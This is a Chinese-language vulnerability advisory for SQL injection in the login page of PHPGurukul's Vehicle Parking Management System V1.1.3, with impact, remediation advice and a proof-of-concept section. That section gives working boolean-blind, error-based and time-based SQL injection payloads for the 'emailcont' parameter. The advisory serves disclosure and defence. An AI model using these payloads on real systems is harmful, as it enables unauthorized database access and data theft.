关键信息总结 受影响的产品 产品名称: Vehicle parking Management System 厂商主页: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/ 影响版本和修复版本 提交者: Flow Huang 易受攻击的文件: /vpm/users/login.php 版本: V1.1.3 软件链接: https://phpgurukul.com/wp-content/uploads/2019/07/Vehicle-parking-Management-System-in-PHP.zip 漏洞类型 漏洞类型: SQL注入 根因 由于 参数的用户输入验证不足,导致SQL注入漏洞。 影响 攻击者可以利用此漏洞未经授权访问数据库、敏感数据泄露、数据篡改、全面系统控制,甚至服务中断,对系统安全和业务连续性构成严重威胁。 描述 在对“Vehicle parking Management System”的安全审查中,发现了一个关键的SQL注入漏洞,允许攻击者注入恶意SQL查询。因此,攻击者可以获得未经授权的数据库访问权限,修改或删除数据,并访问敏感信息。 漏洞详情和POC 易受攻击的参数: Payload示例: - 布尔盲注: emailcont=4852' OR 6473=6473-- i0x8password=&login= - 错误注入: emailcont=1234567890' OR ROW(9062,1573)=(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9062=9062,1))),0x7170707171) FROM (SELECT SLEEP(5))p)-- ekq8daposive - 时间盲注: emailcont=1234567890' AND (SELECT 8413 FROM (SELECT(SLEEP(5)))eOw)-- M0mN8password=... 建议修复措施 1. 使用预编译语句和参数绑定。 2. 输入验证和过滤。 3. 最小化数据库用户权限。 4. 定期进行安全审计。